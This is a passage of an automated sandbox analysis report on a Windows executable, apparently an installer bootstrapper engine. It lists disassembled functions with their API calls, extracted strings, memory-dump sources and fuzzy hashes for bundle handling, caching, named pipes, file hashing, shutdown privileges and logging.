                                                                                                                                                                    • Instruction Fuzzy Hash: 00C13376D4123DABD7308B969D48FDFFABCAF45750F0105AAAD05B7240E7709D808EA0
                                                                                                                                                                    Function 0092C332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to copy key for pseudo bundle payload., xrefs: 0092C3F3
                                                                                                                                                                    • Failed to allocate memory for dependency providers., xrefs: 0092C6DE
                                                                                                                                                                    • Failed to copy local source path for pseudo bundle., xrefs: 0092C43B
                                                                                                                                                                    • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 0092C385
                                                                                                                                                                    • Failed to append relation type to install arguments for related bundle package, xrefs: 0092C5A9
                                                                                                                                                                    • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0092C3BE
                                                                                                                                                                    • Failed to copy uninstall arguments for related bundle package, xrefs: 0092C623
                                                                                                                                                                    • -%ls, xrefs: 0092C34C
                                                                                                                                                                    • pseudobundle.cpp, xrefs: 0092C379, 0092C3B2, 0092C4A1, 0092C6D2
                                                                                                                                                                    • Failed to copy filename for pseudo bundle., xrefs: 0092C417
                                                                                                                                                                    • Failed to copy cache id for pseudo bundle., xrefs: 0092C55F
                                                                                                                                                                    • Failed to copy key for pseudo bundle., xrefs: 0092C542
                                                                                                                                                                    • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 0092C644
                                                                                                                                                                    • Failed to copy display name for pseudo bundle., xrefs: 0092C74F
                                                                                                                                                                    • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0092C4AD
                                                                                                                                                                    • Failed to copy download source for pseudo bundle., xrefs: 0092C469
                                                                                                                                                                    • Failed to copy install arguments for related bundle package, xrefs: 0092C584
                                                                                                                                                                    • Failed to append relation type to repair arguments for related bundle package, xrefs: 0092C5F1
                                                                                                                                                                    • Failed to copy repair arguments for related bundle package, xrefs: 0092C5D0
                                                                                                                                                                    • Failed to copy version for pseudo bundle., xrefs: 0092C72D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                                                                                                                    • API String ID: 1357844191-2832335422
                                                                                                                                                                    • Opcode ID: 8b0095054a1b437a3ec9bb9ae48cbf4725739eff95bf5dc5c211caa235000dff
                                                                                                                                                                    • Instruction ID: 8dc031bf4cc386f1298e2cc01e43b79c0ca3e88b441ba22d1b6644672c041910
                                                                                                                                                                    • Opcode Fuzzy Hash: 8b0095054a1b437a3ec9bb9ae48cbf4725739eff95bf5dc5c211caa235000dff
                                                                                                                                                                    • Instruction Fuzzy Hash: E0C1EFB1A04626BFCB26DF24D895F6E77A9BF48754B004629FD05EB290DB70EC048BD0
                                                                                                                                                                    Function 009045EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00904617
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0090461E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00904628
                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00904678
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00904682
                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 009046C6
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009046D0
                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0090470C
                                                                                                                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 0090471D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00904727
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0090477D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                                                                                                                                    • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                                                                    • API String ID: 2241679041-1583736410
                                                                                                                                                                    • Opcode ID: ad0de1f8dd14199a81238e5b17d6c061c36d3d998ebb07f52f62c8ae8f3247f3
                                                                                                                                                                    • Instruction ID: 8e8b166f05e4be56fa3372871541df81859cc650ec20dfad420f7de320510549
                                                                                                                                                                    • Opcode Fuzzy Hash: ad0de1f8dd14199a81238e5b17d6c061c36d3d998ebb07f52f62c8ae8f3247f3
                                                                                                                                                                    • Instruction Fuzzy Hash: E941E9B7A51239BFDB209BA99C4AF6F765CAB42B55F110125FF00FB1C0E7658C0096E1
                                                                                                                                                                    Function 00914EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00914F0D
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,0090452F,?), ref: 00914F16
                                                                                                                                                                    • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0090452F,?), ref: 00914FB8
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?), ref: 00914FC5
                                                                                                                                                                    • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,0090452F), ref: 00915040
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0090452F,?), ref: 0091504B
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0090452F,?), ref: 0091508B
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,0090452F,?), ref: 009150B9
                                                                                                                                                                    Strings
                                                                                                                                                                    • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 00914F08
                                                                                                                                                                    • \\.\pipe\%ls, xrefs: 00914F6E
                                                                                                                                                                    • Failed to allocate full name of cache pipe: %ls, xrefs: 00915022
                                                                                                                                                                    • Failed to allocate full name of pipe: %ls, xrefs: 00914F84
                                                                                                                                                                    • \\.\pipe\%ls.Cache, xrefs: 0091500C
                                                                                                                                                                    • Failed to create the security descriptor for the connection event and pipe., xrefs: 00914F44
                                                                                                                                                                    • Failed to create pipe: %ls, xrefs: 00914FF6, 0091507C
                                                                                                                                                                    • pipe.cpp, xrefs: 00914F3A, 00914FE9, 0091506F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                                                                                                                                    • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                                    • API String ID: 1214480349-3253666091
                                                                                                                                                                    • Opcode ID: 0b21130afe9bc559f3d3f3a84376ac2acdb3dc2a04b0c33f5509c09a19ffab87
                                                                                                                                                                    • Instruction ID: 5596261d3ee9f277a42b857bc67656bd07ad1b1d47b047fd994ad48baba5dc6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b21130afe9bc559f3d3f3a84376ac2acdb3dc2a04b0c33f5509c09a19ffab87
                                                                                                                                                                    • Instruction Fuzzy Hash: CE51C636E40629FBDB219AE58C46FDE7B68AF48725F120160FE14B62D0D3B55E80DBD0
                                                                                                                                                                    Function 0093FA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00919F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 0093FAC7
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FAD1
                                                                                                                                                                    • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 0093FB0E
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FB18
                                                                                                                                                                    • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 0093FB5F
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0093FB83
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FB8D
                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 0093FBCA
                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0093FBE1
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FBFC
                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 0093FC34
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FC3E
                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 0093FC77
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093FC85
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                                    • String ID: cryputil.cpp
                                                                                                                                                                    • API String ID: 3955742341-2185294990
                                                                                                                                                                    • Opcode ID: a6b4a96447d4abaac9e68b08558eb971d652e54444923516aa5952177d183ff7
                                                                                                                                                                    • Instruction ID: 89995fb2717c3dad014dae15bba59f29c7a102a4ef6190c9bd5ffe0d2396b0b8
                                                                                                                                                                    • Opcode Fuzzy Hash: a6b4a96447d4abaac9e68b08558eb971d652e54444923516aa5952177d183ff7
                                                                                                                                                                    • Instruction Fuzzy Hash: AD51C577D50239ABDB318A55CC25FDBBAB8AF04751F0141B5BE48FA180E7B49D809EE0
                                                                                                                                                                    Function 00919E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to concat complete cached path., xrefs: 00919EF4
                                                                                                                                                                    • Failed to transfer working path to unverified path for payload: %ls., xrefs: 00919FA4
                                                                                                                                                                    • Failed to reset permissions on unverified cached payload: %ls, xrefs: 00919FF1
                                                                                                                                                                    • moving, xrefs: 0091A029
                                                                                                                                                                    • Failed to create unverified path., xrefs: 00919F6E
                                                                                                                                                                    • copying, xrefs: 0091A030, 0091A038
                                                                                                                                                                    • Failed to move verified file to complete payload path: %ls, xrefs: 0091A06C
                                                                                                                                                                    • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 00919FCB
                                                                                                                                                                    • Failed to get cached path for package with cache id: %ls, xrefs: 00919EC8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                                                                                                                    • API String ID: 0-1289240508
                                                                                                                                                                    • Opcode ID: 48049d552ea2dc7148e6b11347a8c80462a5ef0f56a2f8d2ecdbf89ef33b0730
                                                                                                                                                                    • Instruction ID: 8b2498c0249c13a0abc593cad4ed4d8e83ac2eebf39657ffe76b60d617e78851
                                                                                                                                                                    • Opcode Fuzzy Hash: 48049d552ea2dc7148e6b11347a8c80462a5ef0f56a2f8d2ecdbf89ef33b0730
                                                                                                                                                                    • Instruction Fuzzy Hash: C4517F31E0511DFBDF226EA4CD12FED7B76AF49710F100151FA00B61A1E7729EA1AB81
                                                                                                                                                                    Function 009062AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetVersionExW.KERNEL32(0000011C), ref: 009062F8
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906302
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastVersion
                                                                                                                                                                    • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 305913169-1971907631
                                                                                                                                                                    • Opcode ID: 5f67571c5419697e1baf0faf427569c273b61722aa2461555c3bf6bcbf18370c
                                                                                                                                                                    • Instruction ID: 6c526a345aa5715a0dba8ad8c7923d67cd9bee2c79bd4412609408b5846ed941
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f67571c5419697e1baf0faf427569c273b61722aa2461555c3bf6bcbf18370c
                                                                                                                                                                    • Instruction Fuzzy Hash: 6941B372A04228AFDB209B699C49FEF7BB8EB86710F00059AF545E7190D7349E90CB90
                                                                                                                                                                    Function 00906037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00906062
                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00906076
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00906088
                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 009060DC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009060E6
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get the Date., xrefs: 0090610B
                                                                                                                                                                    • Failed to set variant value., xrefs: 00906124
                                                                                                                                                                    • variable.cpp, xrefs: 009060A3, 00906101
                                                                                                                                                                    • Failed to get the required buffer length for the Date., xrefs: 009060AD
                                                                                                                                                                    • Failed to allocate the buffer for the Date., xrefs: 009060C4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                    • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 2700948981-3682088697
                                                                                                                                                                    • Opcode ID: 5f7ce323ca3c6390c0f69d398aee25a77a963473e4b0c460ec13dace667e97ea
                                                                                                                                                                    • Instruction ID: e1343a2ff063429a568e50246cf1ecd19b333a3007226187aab3d0fbe6bccf26
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f7ce323ca3c6390c0f69d398aee25a77a963473e4b0c460ec13dace667e97ea
                                                                                                                                                                    • Instruction Fuzzy Hash: 4631B536A4522A7FDB119BEA8C86FAFBAB8AB44710F110425FE00F72C1D7709D5096E1
                                                                                                                                                                    Function 0093FEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0096B5FC,00000000,?,?,?,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0093FEF4
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0093FF04
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0093FF0D
                                                                                                                                                                    • GetLocalTime.KERNEL32(8007139F,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0093FF23
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0096B5FC,009212CF,?,00000000,0000FDE9,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0094001A
                                                                                                                                                                    Strings
                                                                                                                                                                    • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0093FFC0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                    • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                                    • API String ID: 296830338-59366893
                                                                                                                                                                    • Opcode ID: cffda8cfbeaff5ec2fbcd72779188d6656e55d03e9e505577ebeef1b01e2bc88
                                                                                                                                                                    • Instruction ID: c6a88122b5bc4ad5c1bc1728865d11e307ed6ef3fad08a4168f3812ee8d61c76
                                                                                                                                                                    • Opcode Fuzzy Hash: cffda8cfbeaff5ec2fbcd72779188d6656e55d03e9e505577ebeef1b01e2bc88
                                                                                                                                                                    • Instruction Fuzzy Hash: 96419071D04219ABDF219FA4DC55FBEB7B8EB49711F000029FA01E6250E734CD80EBA1
                                                                                                                                                                    Function 00919B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 00919BF2
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00919C19
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00919C79
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00919C84
                                                                                                                                                                      • Part of subcall function 00903CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00903D40
                                                                                                                                                                      • Part of subcall function 00903CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903D53
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                                                    • String ID: *.*$.unverified
                                                                                                                                                                    • API String ID: 457978746-2528915496
                                                                                                                                                                    • Opcode ID: bb302498c03cbc1fc65fc6318345f07c2251edca02b8d4aea0683f2fbf269373
                                                                                                                                                                    • Instruction ID: e8c0048dd07bfa2601b35f7c8d503f170042dbfc493512e1561035a4253e4eef
                                                                                                                                                                    • Opcode Fuzzy Hash: bb302498c03cbc1fc65fc6318345f07c2251edca02b8d4aea0683f2fbf269373
                                                                                                                                                                    • Instruction Fuzzy Hash: D7418030A0452CAEDB21AB64DD5DFEAB7FCAF84301F4001A1E889E10A1EB719EC4DF54
                                                                                                                                                                    Function 0094887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 009488D0
                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 009488E2
                                                                                                                                                                    Strings
                                                                                                                                                                    • crypt32.dll, xrefs: 009488A0
                                                                                                                                                                    • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 009488B9
                                                                                                                                                                    • feclient.dll, xrefs: 009488AA
                                                                                                                                                                    • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0094892D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                    • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                                                                                                                    • API String ID: 1772835396-1985132828
                                                                                                                                                                    • Opcode ID: 9f9976684f47efa450a7934eb30f485a464fb5b513a585eb3b1bd4f8dadc6c1f
                                                                                                                                                                    • Instruction ID: 6c4a1c3cd7bebccc19b5bb2d98b5ae593b4cdc6565a1bd7a449efab216468f77
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f9976684f47efa450a7934eb30f485a464fb5b513a585eb3b1bd4f8dadc6c1f
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C21F8A6900128EADB60DB9ADC05FBFB3FCEB5C711F00455AF955E2180E7799A80D770
                                                                                                                                                                    Function 0093AA0E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
